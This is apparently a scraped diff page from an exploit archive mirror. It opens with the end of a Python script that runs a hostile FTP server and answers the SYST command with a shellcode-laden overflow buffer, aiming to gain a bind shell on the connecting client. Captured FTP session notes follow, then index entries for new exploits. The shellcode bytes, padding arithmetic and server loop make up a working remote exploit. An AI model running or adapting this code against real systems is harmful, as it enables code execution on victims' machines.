"\xec\x2e\x99\xe8\x11\x30\x42\x54\xb4\x3b\x6f\x81\xc5\x66\xf8"
|
||||
"\x66\xe4\x98\xf8\xe0\x7f\xeb\xca\xaf\x2b\x63\x67\x27\xf2\x74"
|
||||
"\x88\x12\x42\xea\x77\x9d\xb3\x23\xbc\xc9\xe3\x5b\x15\x72\x68"
|
||||
"\x9b\x9a\xa7\x05\x93\x3d\x18\x38\x5e\xfd\xc8\xfc\xf0\x96\x02"
|
||||
"\xf3\x2f\x86\x2c\xd9\x58\x2f\xd1\xe2\x72\xae\x5c\x04\x10\xde"
|
||||
"\x08\x9e\x8c\x1c\x6f\x17\x2b\x5e\x45\x0f\xdb\x17\x8f\x88\xe4"
|
||||
"\xa7\x85\xbe\x72\x2c\xca\x7a\x63\x33\xc7\x2a\xf4\xa4\x9d\xba"
|
||||
"\xb7\x55\xa1\x96\x2f\xf5\x30\x7d\xaf\x70\x29\x2a\xf8\xd5\x9f"
|
||||
"\x23\x6c\xc8\x86\x9d\x92\x11\x5e\xe5\x16\xce\xa3\xe8\x97\x83"
|
||||
"\x98\xce\x87\x5d\x20\x4b\xf3\x31\x77\x05\xad\xf7\x21\xe7\x07"
|
||||
"\xae\x9e\xa1\xcf\x37\xed\x71\x89\x37\x38\x04\x75\x89\x95\x51"
|
||||
"\x8a\x26\x72\x56\xf3\x5a\xe2\x99\x2e\xdf\x12\xd0\x72\x76\xbb"
|
||||
"\xbd\xe7\xca\xa6\x3d\xd2\x09\xdf\xbd\xd6\xf1\x24\xdd\x93\xf4"
|
||||
"\x61\x59\x48\x85\xfa\x0c\x6e\x3a\xfa\x04"
|
||||
) # 355
|
||||
sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)
|
||||
|
||||
|
||||
cases = {
|
||||
"USER": "331 user OK. Pass required",
|
||||
"PASS": "230 OK, current directory is /",
|
||||
# "SYST": "215 UNIX Type: L8",
|
||||
|
||||
"SYST": sploit, # CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP
|
||||
|
||||
"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
|
||||
"SITE UMASK": "500 SITE UMASK is an unknown extension",
|
||||
"CWD": "250 OK, current directory whatever you think it is",
|
||||
"PORT": "200 PORT command successful",
|
||||
"PASV": "227 Entering PASV mode",
|
||||
"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
|
||||
}
|
||||
|
||||
|
||||
sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
sx.bind(("192.168.56.181",21))
|
||||
sx.listen(5)
|
||||
print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
|
||||
cx,addr = sx.accept()
|
||||
print("[!] Connection received from %s" % str(addr))
|
||||
cx.send("220 HostileFTPd v0.0 alpha !\r\n")
|
||||
notified = 0
|
||||
while True:
|
||||
req = cx.recv(1024)
|
||||
for key, resp in cases.items():
|
||||
if key in req:
|
||||
cx.send(resp + "\r\n")
|
||||
if "SITE UMASK" in req and notified == 0:
|
||||
print("[!] Buffer sent. Bind shell on client's port 5150?")
|
||||
notified = 1
|
||||
if "PASV" in req:
|
||||
justpause = raw_input("[.] PASV received. Pausing recv buffer")
|
||||
|
||||
|
||||
NOTES="""\
|
||||
### followed TCP stream in normal client connect to ftp server
|
||||
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
|
||||
220-You are user number 1 of 50 allowed.
|
||||
220-Local time is now 13:47. Server port: 21.
|
||||
220-This is a private system - No anonymous login
|
||||
220-IPv6 connections are also welcome on this server.
|
||||
220 You will be disconnected after 15 minutes of inactivity.
|
||||
USER bozo
|
||||
331 User bozo OK. Password required
|
||||
PASS theclown
|
||||
230-User bozo has group access to: 1003
|
||||
230 OK. Current directory is /
|
||||
SYST
|
||||
215 UNIX Type: L8
|
||||
TYPE I
|
||||
200 TYPE is now 8-bit binary
|
||||
SITE UMASK 022
|
||||
500 SITE UMASK is an unknown extension
|
||||
CWD /
|
||||
250 OK. Current directory is /
|
||||
PASV
|
||||
227 Entering Passive Mode (192,168,56,181,183,29)
|
||||
LIST -a
|
||||
150 Accepted data connection
|
||||
226-ASCII
|
||||
226-Options: -a -l
|
||||
226 3 matches total
|
||||
"""
|
|
@ -6584,6 +6584,7 @@ id,file,description,date,author,type,platform,port
|
|||
47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple,
|
||||
47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows,
|
||||
47565,exploits/multiple/dos/47565.txt,"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation",2019-10-30,"Google Security Research",dos,multiple,
|
||||
47578,exploits/macos/dos/47578.c,"Apple macOS 10.15.1 - Denial of Service (PoC)",2019-11-04,08Tc3wBB,dos,macos,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -10741,6 +10742,10 @@ id,file,description,date,author,type,platform,port
|
|||
47556,exploits/windows/local/47556.txt,"Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path",2019-10-29,"Alberto Vargas",local,windows,
|
||||
47568,exploits/windows/local/47568.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)",2019-10-31,4ll4u,local,windows,
|
||||
47570,exploits/windows/local/47570.txt,"OpenVPN Private Tunnel 2.8.4 - 'ovpnagent' Unquoted Service Path",2019-11-01,"Sainadh Jamalpur",local,windows,
|
||||
47574,exploits/windows/local/47574.py,"Aida64 6.10.5200 - Buffer Overflow (SEH)",2019-11-04,daejinoh,local,windows,
|
||||
47575,exploits/windows/local/47575.txt,"OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path",2019-11-04,"Luis Martínez",local,windows,
|
||||
47577,exploits/windows/local/47577.txt,"Launch Manager 6.1.7600.16385 - 'DsiWMIService' Unquoted Service Path",2019-11-04,"Gustavo Briseño",local,windows,
|
||||
47580,exploits/linux/local/47580.rb,"Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)",2019-11-04,Metasploit,local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -17748,6 +17753,7 @@ id,file,description,date,author,type,platform,port
|
|||
47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
|
||||
47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
|
||||
47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
|
||||
47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue